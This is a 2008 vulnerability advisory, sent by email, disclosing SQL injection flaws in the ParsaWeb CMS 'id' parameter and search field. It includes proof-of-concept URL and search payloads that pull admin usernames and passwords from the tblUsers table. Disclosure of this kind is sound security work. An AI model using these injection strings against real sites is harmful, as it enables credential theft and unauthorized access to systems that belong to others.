Date: Sun, 28 Sep 2008 16:01:03 +0330
From: [email protected]
To: [email protected]Subject: ParsaWeb CMS SQL Injection
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-1;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
X-Virus-Scanned: antivirus-gw at tyumen.ru
########################## www.BugReport.ir =20
#######################################
#
#=09=09AmnPardaz Security Research Team
#
# Title: ParsaWeb CMS SQL Injection
# Vendor: http://www.parsagostar.com
# Demo: http://cms.parsagostar.com/
# Exploit: Available
# Impact: High
# Fix: N/A
# Original advisory: http://www.bugreport.ir/index_53.htm
############################################################################=
#######
####################
1. Description:
####################
=09ParsaWeb is a commercial ASP.NET website and content management system.
####################
2. Vulnerabilities:
####################
=09Input passed to the "id" parameter in default.aspx and txtSearch in =20
search section are not properly sanitised before being used in SQL =20
queries.
=09This can be exploited to manipulate SQL queries by injecting =20
arbitrary SQL code.
####################
3. Exploits/POCs:
####################
=09http://www.example.com/?page=3Dpage&id=3D-164 or 1=3D(select top 1 =20
user_pass from tblUsers where user_name =3D 'admin')
=09http://www.example.com/?page=3DSearch
=09Search:AmnPardaz%') union ALL select =20
'1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from =20
tblUsers--
####################
4. Solution:
####################
=09Edit the source code to ensure that inputs are properly sanitized.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
